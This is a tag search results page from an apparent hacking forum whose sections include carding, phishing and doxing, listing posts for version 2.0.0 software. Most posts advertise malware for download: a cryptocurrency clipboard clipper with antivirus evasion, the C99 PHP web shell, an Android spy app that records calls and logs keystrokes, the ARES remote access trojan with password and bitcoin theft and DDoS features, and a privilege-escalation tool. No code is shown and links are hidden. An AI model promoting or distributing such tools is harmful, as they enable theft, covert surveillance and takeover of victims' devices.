Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Search the Community

Showing results for tags 'v2.0.0'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Pentesting Zone
    • Pentesting Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Pentesting Premium
    • Pentesting Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Pentesting Zone PRIV8
    • Pentesting Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area
  • Recycle Bin
    • Recycle
  • Null3D's Nulled Group

Product Groups

  • PRIV8
  • Advertising
  • Access Basic
  • Seller
  • Services

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me

Found 11 results

  1. Local privilege escalation via PetitPotam (Abusing impersonate privileges). [hide][Hidden Content]]
  2. Clipper is written in C# and replaces it with the most similar one by the first and last characters from your list of wallets. It has a hidden installation in the system, auto-loading and bypassing popular antiviruses, it is removed from the place of the initial launch. Disclaimer This program is for educational purposes only. How you use this program is your responsibility. I will not be held accountable for any illegal activities. Wallets: Bitcoin - 1*** 3*** bc1*** Ethereum All Tokens - 0x*** All Tokens, USDT, ETC... Monero - 4*** 8*** Stellar - G*** Ripple - r*** Neocoin - A*** Bitcoin Cash - bitcoincash:*** q*** p*** Dogecoin - D*** Litecoin - M*** L*** Dashcoin - X*** Tron - T*** ZCash - t1*** Binance - bnb*** Fenix Clipper Release_2.0.0 Added an increase in file weight when creating a build and an increase in infection. pamp file. [Hidden Content] Server Scan [Hidden Content]
  3. C99Shell-PHP7 PHP 7 and safe-build Update of the popular C99 variant of PHP Shell. c99shell.php v.2.0 (PHP 7) (25.02.2019) Updated by: PinoyWH1Z for PHP 7 About C99Shell An excellent example of a web shell is the c99 variant, which is a PHP shell (most of them calls it malware) often uploaded to a vulnerable web application to give hackers an interface. The c99 shell lets the attacker take control of the processes of the Internet server, allowing him or her give commands on the server as the account under which the threat is operating. It lets the hacker upload, browse the file system, edit and view files, in addition, to deleting, moving them and changing permissions. Finding a c99 shell is an excellent way to identify a compromise on a system. The c99 shell is about 1500 lines long if packed and 4900+ if properly displayed, and some of its traits include showing security measures the web server may use, a file viewer that has permissions, a place where the attacker can operate custom PHP code (PHP malware c99 shell). There are different variants of the c99 shell that are being used today. This github release is an example of a relatively recent one. It has many signatures that can be utilized to write protective countermeasures. About this release: I've been using php shells as part of my Ethical Hacking activities. And I have noticed that most of the php shells that are downloadable online are encrypted with malicious codes and without you knowing, others also insert trackers so they can see where you placed your php shell at. I've came up with an idea such as "what if I get the stable version of c99shell and reverse the encrypted codes, remove the malicious codes and release it to public for good." And yeah, I decided to do it, but I noticed that most of the servers now have upgraded their apache service to PHP 7, sadly, the codes that I have is for PHP 5.3 and below. The good thing is.. only few lines of syntax are needed to be altered, so I did it. Here you go mates, a clean and safe-build version of the most stable c99shell that I can see. If ever you see more bugs, please create an issue or just fork it, update it and do a pull request so I can check it and update the codes for stabilization. PS: This is a widely used php shell by hackers, so don't freak out if your anti-virus/anti-malware detects this php file as malicious or treated as backdoor. Since you can see the codes in my re-released project, you can read all throughout the codes and inspect or even debug as much as you like. Disclaimer: I will NOT be held responsible for any unethical use of this hacking tool. Official Release (v2.0.0) Latest Dec 27, 2022 [hide][Hidden Content]]
  4. This PHP video downloader script allows you to download from 40 websites with one-click. You will get good support and regularly updated software also. And YouTube video downloader script can fetch videos from 144P 15 FPS to 4K 60 FPS and allows to you highspeed download with removing YouTube bandwidth speed limit. [Hidden Content] [hide][Hidden Content]]
  5. [hide][Hidden Content]]
  6. WhatsApp Contacts Extractor is a chrome extension that allows you in a single click to download all numbers include name (if available) from your WhatsApp accounts and save it in an excel sheet (.csv file) and .txt. [Hidden Content] [hide][Hidden Content]]
  7. Hello Beautiful peoples Today we share new Dehashed Tool which are very HQ Tool For Crackers and Noobs Friends Tool working to Fixing SHA1 Adding New Hash Algorithms - Adding NEW Database [1.200.000.000 Words] (Problem - Barely any Sites Support these Amount of Words + File can't be Opened by most Tools [13GB+] - Updating Design - Add File/Drop Support hope you guys really like it. [hide][Hidden Content]]
  8. Perfex CRM Email Builder is a design tool that helps you to effortlessly customize the emails that Perfex CRM is sending to your clients and team; for example, the order confirmation email sent to all customers when they make a purchase. Demo: [Hidden Content] [HIDE][Hidden Content]]
  9. Feacture Multiple Child clients Hidden app icon (stealth mode) Real-time location. Recording calls: incoming/outgoing. SMS: received/sent. Environment recording. Take pictures. Keylogger. Phishing social network. Notifications received: Whatsapp, Instagram, Messenger. Build this project the application work with the api of firebase with which you will have to create a project in firebase and synchronize the application with such project. Firebase API Enable the following development platforms on firebase: Authentication, realtime database and storage. in authentication/sign-in method enable the email access provider in firebase real-time database assign the following rules: [Hidden Content] in firebase storage assign the following rules: [Hidden Content] In the build.gradle assign the social network package of your preference. also you will have to recreate the view in xml of the social network [Hidden Content] In the res/values/string.xml assign your APY_KEY_MAPS Get the GOOGLE MAPS API KEY here [Hidden Content] note: it is very important that accept all the necessary permissions for the application to work properly Pictures [Hidden Content] [HIDE][Hidden Content]]
  10. GetVideo created with latest technologies such as NodeJs ,Bootstrap 4, Jquery and others. You can download 1080p ( Video only ), 720p, 360p, 240p videos and Audio. Support MP4, WEBM, M4A and other file formats. The design is fully responsive based on bootstrap 4. Demo: [Hidden Content] 189 [HIDE][Hidden Content]]
  11. This program has been created by dEEpEst --- RELEASES VERSION --- This version is version 2.0.0 has just been born --- DESCRIPTION --- This software is a remote administration tool --- LINKS --- [Hidden Content] [Hidden Content]/hackers/topic/44370-ares-rat-v100/ [Hidden Content]/hackers/topic/44869-ares-rat-v121 In contruccioon .... --- TUTORIALS AND MANUALS --- [Hidden Content] [Hidden Content] In contruccioon .... --- AUTHORS --- [Hidden Content]/hackers/profile/1-deepest/ --- DONATE --- You can always help us by sending any amount to one of these accounts [Hidden Content]/hackers/clients/donations/ In contruccioon .... --- COPYRIGHT --- Its free distribution is allowed as long as the credits and links are respected --- UPDATE VERSION --- ARES RAT v2.0.0 --- WHAT'S NEW IN THIS VERSION --- Proxy Reverse Checked Proxy It was repaired sight flags by countries Was added "sqlite3" missing library Was added two styles darks //:::::::::::::::::::::::::::::::::::::::::::::::::::// --- UPDATE VERSION --- ARES RAT v1.2.1 --- WHAT'S NEW IN THIS VERSION --- Was added missing style library Changed target platform in ATENEA.exe (server) for NET. Framework 2.0 It was repaired active firewall tester //:::::::::::::::::::::::::::::::::::::::::::::::::::// --- TITLE & VERSION --- ARES RAT v1.0.0 --- DESCRIPTION --- ARES RAT is a remote administration tool. We can remotely control other computers millions of kilometers away. Things like viewing files, downloading them, changing registers, running programs, watching webcam, stealing BTC, stealing passwords, registering keystrokes, launching Ddos attacks, and many other things. --- FEATURES --- File Manager Remote Desktop Remote Cam Remote Shell Process Manager Run File from Disck Run File from Link Regedit Start Process Stop Process Run Script Notify Chat Keylooger Get Password Stealer Bitcoin DDos Atack Bypass UAC Disable/Enable Windows OFF Shutdown Restart IExplorer Home Page Windows Update ON/OFF Desktop Icons Show/Hide Taskbar Show/Hide Sound Mute/UnMute Sound Beep Speak Computer Play Music Hidden Error Sound CMD Enable/Disable CD Open/Close Clock Show/Hide Keyboard Block/UnBlock Mouse Reverse/Normal Cursor Show/Hide Monitor Turn Off/On Task Manager Enable/Disable Registry Enable/Disable System Restore Enable/Disable Open Website Get ClipBoard Copi IP User Info Computer Info Server Rename Server Update Server Closed/Restart Server Uninstall Extras Port Listen Password Lenguage (Only English) Change Styles Port Scanner IP Grabber Spoofer No-IP Binder Mutex Persistence Hide After Run Melt After Run Startup Copy folder temp Directory server Install Server folders Injection Svchost Antis Spread USB Block VirusTotal Change Icon Logs --- DISCLAIMERS --- You can use and distribute this tool freely, keep in mind that this tool is designed for student use and that you are responsible for the misuse that could be given. --- BUGS --- All the bugs can be repeated anywhere in the "About" tab, and I will try to correct it as soon as possible. --- PERSONAL NOTE --- For a long life for this warrior! Happy hacking! Download: [HIDE][Hidden Content]] Password: level23hacktools.com
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.